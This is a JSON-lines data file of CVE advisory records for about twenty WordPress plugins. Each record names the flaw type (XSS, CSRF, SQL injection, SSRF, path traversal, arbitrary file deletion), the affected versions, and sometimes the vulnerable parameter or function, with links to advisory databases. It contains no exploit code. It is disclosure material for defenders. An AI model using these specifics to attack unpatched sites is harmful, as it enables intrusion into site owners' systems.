{"CVE_ID":"CVE-2025-31923","slug":"css3_accordions","versionImpact":"3.0","description":"Missing Authorization vulnerability in QuanticaLabs CSS3 Accordions for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CSS3 Accordions for WordPress: from n\/a through 3.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_accordions\\\/vulnerability\\\/wordpress-css3-accordions-for-wordpress-3-0-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_accordions\\\/vulnerability\\\/wordpress-css3-accordions-for-wordpress-3-0-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2688","slug":"wp-file-upload","versionImpact":"4.19.1","description":"The WordPress File Upload and WordPress File Upload Pro plugins for WordPress are vulnerable to Path Traversal in versions up to, and including, 4.19.1 via the vulnerable parameter wfu_newpath. This allows administrator-level attackers to move files uploaded with the plugin (located in wp-content\/uploads by default) outside of the web root.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2915978%40wp-file-upload%2Ftrunk&old=2909107%40wp-file-upload%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2915978%40wp-file-upload%2Ftrunk&old=2909107%40wp-file-upload%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abd6eeac-0a7e-4762-809f-593cd85f303d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abd6eeac-0a7e-4762-809f-593cd85f303d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4412","slug":"wp-prayer","versionImpact":"1.6.5","description":"The WP Prayer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.5. This is due to missing or incorrect nonce validation on the save() and export() functions. This makes it possible for unauthenticated attackers to save plugin settings and trigger a data export via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7efbdb1-989f-4171-ab55-aff66014337a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7efbdb1-989f-4171-ab55-aff66014337a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2543740%40wp-prayer&new=2543740%40wp-prayer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2543740%40wp-prayer&new=2543740%40wp-prayer&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3025","slug":"dropbox-folder-share","versionImpact":"1.9.7","description":"The Dropbox Folder Share plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 1.9.7 via the 'link' parameter. This can allow unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dropbox-folder-share\\\/trunk\\\/HynoTech\\\/DropboxFolderShare\\\/Principal.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dropbox-folder-share\\\/trunk\\\/HynoTech\\\/DropboxFolderShare\\\/Principal.php#L118\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d62bd2bd-db01-479f-89e4-8031d69a912f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d62bd2bd-db01-479f-89e4-8031d69a912f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5114","slug":"idbbee","versionImpact":"1.0","description":"The idbbee plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'idbbee' shortcode in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/idbbee\\\/trunk\\\/idbbee.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/idbbee\\\/trunk\\\/idbbee.php#L34\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac763936-7147-4100-8a46-4c6d2f2224b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac763936-7147-4100-8a46-4c6d2f2224b4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4478","slug":"happy-elementor-addons","versionImpact":"3.10.7","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Stack Group widget in all versions up to, and including, 3.10.7 due to insufficient input sanitization and output escaping on user supplied 'tooltip_position' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7243f40-5cca-475a-bb27-44fab965bb0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7243f40-5cca-475a-bb27-44fab965bb0e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.7\\\/widgets\\\/image-stack-group\\\/widget.php#L611\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.7\\\/widgets\\\/image-stack-group\\\/widget.php#L611\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083138\\\/#file584\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083138\\\/#file584\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4462","slug":"nafeza-prayer-time","versionImpact":"1.2.9","description":"The Nafeza Prayer Time plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efbf83d9-ce5e-4139-ba12-b00df4d9ad89?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efbf83d9-ce5e-4139-ba12-b00df4d9ad89?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nafeza-prayer-time\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nafeza-prayer-time\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3627","slug":"wheel-of-life","versionImpact":"1.1.7","description":"The Wheel of Life: Coaching and Assessment Tool for Life Coach plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on several functions in the AjaxFunctions.php file in all versions up to, and including, 1.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts and modify settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0615d1be-f9fa-45b3-9d5b-3ad1f36be8e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0615d1be-f9fa-45b3-9d5b-3ad1f36be8e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wheel-of-life\\\/trunk\\\/includes\\\/functions\\\/AjaxFunctions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wheel-of-life\\\/trunk\\\/includes\\\/functions\\\/AjaxFunctions.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6926","slug":"viral-signup","versionImpact":"2.1","description":"The Viral Signup  WordPress plugin through 2.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ce96ce5-fcf0-4d7a-b562-f63ea3418d93\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ce96ce5-fcf0-4d7a-b562-f63ea3418d93\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11938","slug":"woo-one-click-upsell-funnel","versionImpact":"3.4.9","description":"The One Click Upsell Funnel for WooCommerce \u2013  Funnel Builder for WordPress, Create WooCommerce Upsell, Post-Purchase Upsell & Cross Sell Offers that Boost Sales & Increase Profits with Sales Funnel Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wps_wocuf_pro_yes shortcode in all versions up to, and including, 3.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-one-click-upsell-funnel\\\/tags\\\/3.4.9\\\/public\\\/class-woocommerce-one-click-upsell-funnel-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-one-click-upsell-funnel\\\/tags\\\/3.4.9\\\/public\\\/class-woocommerce-one-click-upsell-funnel-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-one-click-upsell-funnel\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-one-click-upsell-funnel\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c10d6cb-e0a7-4b8d-b50f-e23885355872?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c10d6cb-e0a7-4b8d-b50f-e23885355872?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11815","slug":"posturinn","versionImpact":"1.3.1","description":"The P\u00f3sturinn\\&#039;s Shipping with WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the printed_marked and nonprinted_marked parameters in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posturinn\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posturinn\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a8dc0e3-ff3a-4abc-afca-eb1879603550?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a8dc0e3-ff3a-4abc-afca-eb1879603550?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2882","slug":"green-money-payment-gateway","description":"The GreenPay(tm) by Green.Money plugin for WordPress is vulnerable to Sensitive Information Exposure in versions between 3.0.0 and 3.0.9 through the publicly accessible phpinfo.php script. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/green-money-payment-gateway\\\/trunk\\\/phpinfo.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/green-money-payment-gateway\\\/trunk\\\/phpinfo.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3267032\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3267032\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/green-money-payment-gateway\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/green-money-payment-gateway\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed57bb85-d4b5-4c89-a1c7-c3b8a0a5a2ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed57bb85-d4b5-4c89-a1c7-c3b8a0a5a2ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31922","slug":"css3_accordions","versionImpact":"3.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in QuanticaLabs CSS3 Accordions for WordPress allows Stored XSS. This issue affects CSS3 Accordions for WordPress: from n\/a through 3.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_accordions\\\/vulnerability\\\/wordpress-css3-accordions-for-wordpress-plugin-3-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_accordions\\\/vulnerability\\\/wordpress-css3-accordions-for-wordpress-plugin-3-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4411","slug":"wp-easy-pay","versionImpact":"3.2.0","description":"The WP EasyPay \u2013 Square for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.2.0. This is due to missing or incorrect nonce validation on the wpep_download_transaction_in_excel() function. This makes it possible for unauthenticated attackers to trigger a transactions download via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-pay\\\/trunk\\\/wpep_setup.php?rev=2426641#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-pay\\\/trunk\\\/wpep_setup.php?rev=2426641#L219\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2551919%40wp-easy-pay&new=2551919%40wp-easy-pay&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2551919%40wp-easy-pay&new=2551919%40wp-easy-pay&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1fbb3a6-fcc2-47c5-a086-331e69292add?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1fbb3a6-fcc2-47c5-a086-331e69292add?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5001","slug":"horizontal-scrolling-announcement","versionImpact":"9.2","description":"The Horizontal scrolling announcement for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'horizontal-scrolling' shortcode in versions up to, and including, 9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcement\\\/trunk\\\/horizontal-scrolling-announcement.php#L389\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcement\\\/trunk\\\/horizontal-scrolling-announcement.php#L389\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4f60e8c-2745-4930-9101-914bd73c6e1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4f60e8c-2745-4930-9101-914bd73c6e1c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3829","slug":"font-awesome-4-menus","versionImpact":"4.7.0","description":"The Font Awesome 4 Menus WordPress plugin through 4.7.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/684941ad-541f-43f9-a7ef-d26c0f4e6e21\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/684941ad-541f-43f9-a7ef-d26c0f4e6e21\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4274","slug":"essential-real-estate","versionImpact":"4.4.2","description":"The Essential Real Estate plugin for WordPress is vulnerable to unauthorized loss of data due to insufficient validation on the remove_property_attachment_ajax() function in all versions up to, and including, 4.4.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary attachments.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7dc41eb7-5c9a-4a67-902d-9a855840668b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7dc41eb7-5c9a-4a67-902d-9a855840668b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-real-estate\\\/trunk\\\/public\\\/partials\\\/property\\\/class-ere-property.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-real-estate\\\/trunk\\\/public\\\/partials\\\/property\\\/class-ere-property.php#L28\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11682","slug":"gwebpro-store-locator","versionImpact":"2.1","description":"The G Web Pro Store Locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'q' parameter in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gwebpro-store-locator\\\/trunk\\\/gwebpro-store-locator-frontend.php#L452\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gwebpro-store-locator\\\/trunk\\\/gwebpro-store-locator-frontend.php#L452\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb84b71e-7d4d-4bd7-88cb-1b86d7023edb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb84b71e-7d4d-4bd7-88cb-1b86d7023edb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11686","slug":"manycontacts-bar","versionImpact":"3.0.4","description":"The WhatsApp ?? click to chat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'manycontacts_code' parameter in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/manycontacts-bar\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/manycontacts-bar\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d623840-30d1-4599-a52d-08c28e190699?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d623840-30d1-4599-a52d-08c28e190699?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13767","slug":"live-2d","versionImpact":"1.9.11","description":"The Live2DWebCanvas plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the ClearFiles() function in all versions up to, and including, 1.9.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/live-2d\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/live-2d\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23c89d9f-8958-4333-8604-54173c31efac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23c89d9f-8958-4333-8604-54173c31efac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31915","slug":"pixel-formbuilder","versionImpact":"1.0.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in kamleshyadav Pixel WordPress Form BuilderPlugin & Autoresponder allows Cross Site Request Forgery. This issue affects Pixel WordPress Form BuilderPlugin & Autoresponder: from n\/a through 1.0.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/pixel-formbuilder\\\/vulnerability\\\/wordpress-pixel-wordpress-form-builderplugin-autoresponder-1-0-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/pixel-formbuilder\\\/vulnerability\\\/wordpress-pixel-wordpress-form-builderplugin-autoresponder-1-0-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
